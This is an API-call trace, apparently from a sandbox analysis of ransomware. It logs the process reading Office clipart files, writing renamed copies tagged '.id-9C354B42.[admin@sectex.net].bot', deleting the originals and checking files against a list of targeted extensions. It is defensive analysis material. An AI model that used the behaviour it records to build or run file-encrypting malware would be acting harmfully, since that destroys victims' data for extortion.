	[0143.944] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=37974) returned 1
	[0143.944] CloseHandle (hObject=0x3cc) returned 1
	[0143.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 0x20
	[0143.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0143.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0143.944] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.944] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0143.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0143.945] GetLastError () returned 0x0
	[0143.945] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x9456, lpOverlapped=0x0) returned 1
	[0144.255] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x9460, lpOverlapped=0x0) returned 1
	[0144.256] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.256] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.257] SetEndOfFile (hFile=0x388) returned 1
	[0144.257] CloseHandle (hObject=0x388) returned 1
	[0144.257] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.257] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.259] CloseHandle (hObject=0x3cc) returned 1
	[0144.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.260] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 1
	[0144.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.260] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.260] lstrlenW (lpString=".doc") returned 4
	[0144.260] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString=".docx") returned 5
	[0144.261] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.261] lstrlenW (lpString=".pdf") returned 4
	[0144.261] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString=".xls") returned 4
	[0144.261] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.261] lstrlenW (lpString=".xlsx") returned 5
	[0144.261] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.261] lstrlenW (lpString=".ppt") returned 4
	[0144.261] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString=".zip") returned 4
	[0144.261] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.261] lstrlenW (lpString=".rar") returned 4
	[0144.261] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString=".bz2") returned 4
	[0144.261] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString=".7z") returned 3
	[0144.261] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString=".dbf") returned 4
	[0144.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString=".1cd") returned 4
	[0144.261] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString=".jpg") returned 4
	[0144.261] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.261] lstrlenW (lpString=".doc") returned 4
	[0144.261] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.261] lstrlenW (lpString=".docx") returned 5
	[0144.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.262] lstrlenW (lpString=".pdf") returned 4
	[0144.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString=".xls") returned 4
	[0144.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.262] lstrlenW (lpString=".xlsx") returned 5
	[0144.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.262] lstrlenW (lpString=".ppt") returned 4
	[0144.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.262] lstrlenW (lpString=".zip") returned 4
	[0144.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.262] lstrlenW (lpString=".rar") returned 4
	[0144.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString=".bz2") returned 4
	[0144.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString=".7z") returned 3
	[0144.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.262] lstrlenW (lpString=".dbf") returned 4
	[0144.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.262] lstrlenW (lpString=".1cd") returned 4
	[0144.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63
	[0144.262] lstrlenW (lpString=".jpg") returned 4
	[0144.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.262] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.262] lstrlenW (lpString="DD01039_.WMF") returned 12
	[0144.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.263] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=14820) returned 1
	[0144.263] CloseHandle (hObject=0x3cc) returned 1
	[0144.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 0x20
	[0144.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.263] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.263] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.264] GetLastError () returned 0x0
	[0144.264] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x39e4, lpOverlapped=0x0) returned 1
	[0144.266] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x39f0, lpOverlapped=0x0) returned 1
	[0144.267] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.267] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.267] SetEndOfFile (hFile=0x388) returned 1
	[0144.267] CloseHandle (hObject=0x388) returned 1
	[0144.267] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.267] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.269] CloseHandle (hObject=0x3cc) returned 1
	[0144.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.270] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 1
	[0144.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.271] lstrlenW (lpString=".doc") returned 4
	[0144.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString=".docx") returned 5
	[0144.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.272] lstrlenW (lpString=".pdf") returned 4
	[0144.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString=".xls") returned 4
	[0144.272] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.272] lstrlenW (lpString=".xlsx") returned 5
	[0144.272] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.272] lstrlenW (lpString=".ppt") returned 4
	[0144.272] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString=".zip") returned 4
	[0144.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.272] lstrlenW (lpString=".rar") returned 4
	[0144.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString=".bz2") returned 4
	[0144.272] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString=".7z") returned 3
	[0144.272] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString=".dbf") returned 4
	[0144.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString=".1cd") returned 4
	[0144.272] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString=".jpg") returned 4
	[0144.272] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.272] lstrlenW (lpString=".doc") returned 4
	[0144.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString=".docx") returned 5
	[0144.273] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.273] lstrlenW (lpString=".pdf") returned 4
	[0144.273] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString=".xls") returned 4
	[0144.273] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.273] lstrlenW (lpString=".xlsx") returned 5
	[0144.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.273] lstrlenW (lpString=".ppt") returned 4
	[0144.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.273] lstrlenW (lpString=".zip") returned 4
	[0144.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.273] lstrlenW (lpString=".rar") returned 4
	[0144.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString=".bz2") returned 4
	[0144.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString=".7z") returned 3
	[0144.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.273] lstrlenW (lpString=".dbf") returned 4
	[0144.273] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.273] lstrlenW (lpString=".1cd") returned 4
	[0144.273] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63
	[0144.273] lstrlenW (lpString=".jpg") returned 4
	[0144.273] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.273] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.273] lstrlenW (lpString="DD01138_.WMF") returned 12
	[0144.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.274] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3692) returned 1
	[0144.274] CloseHandle (hObject=0x3cc) returned 1
	[0144.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 0x20
	[0144.274] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.274] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.274] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0144.275] GetLastError () returned 0x0
	[0144.275] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe6c, lpOverlapped=0x0) returned 1
	[0144.278] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe70, lpOverlapped=0x0) returned 1
	[0144.278] ReadFile (in: hFile=0x3cc, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.278] WriteFile (in: hFile=0x388, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.279] SetEndOfFile (hFile=0x388) returned 1
	[0144.279] CloseHandle (hObject=0x388) returned 1
	[0144.279] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.279] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.281] CloseHandle (hObject=0x3cc) returned 1
	[0144.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 1
	[0144.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString=".doc") returned 4
	[0144.282] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString=".docx") returned 5
	[0144.282] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.282] lstrlenW (lpString=".pdf") returned 4
	[0144.282] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString=".xls") returned 4
	[0144.282] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.282] lstrlenW (lpString=".xlsx") returned 5
	[0144.282] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.282] lstrlenW (lpString=".ppt") returned 4
	[0144.282] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString=".zip") returned 4
	[0144.282] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.282] lstrlenW (lpString=".rar") returned 4
	[0144.282] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString=".bz2") returned 4
	[0144.282] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString=".7z") returned 3
	[0144.282] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString=".dbf") returned 4
	[0144.282] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString=".1cd") returned 4
	[0144.282] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString=".jpg") returned 4
	[0144.282] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.283] lstrlenW (lpString=".doc") returned 4
	[0144.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString=".docx") returned 5
	[0144.283] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.283] lstrlenW (lpString=".pdf") returned 4
	[0144.283] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString=".xls") returned 4
	[0144.283] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.283] lstrlenW (lpString=".xlsx") returned 5
	[0144.283] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.283] lstrlenW (lpString=".ppt") returned 4
	[0144.283] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.283] lstrlenW (lpString=".zip") returned 4
	[0144.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.283] lstrlenW (lpString=".rar") returned 4
	[0144.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString=".bz2") returned 4
	[0144.283] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString=".7z") returned 3
	[0144.283] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.283] lstrlenW (lpString=".dbf") returned 4
	[0144.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.283] lstrlenW (lpString=".1cd") returned 4
	[0144.283] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63
	[0144.283] lstrlenW (lpString=".jpg") returned 4
	[0144.283] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.283] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.284] lstrlenW (lpString="DD01139_.WMF") returned 12
	[0144.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.285] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3632) returned 1
	[0144.285] CloseHandle (hObject=0x3cc) returned 1
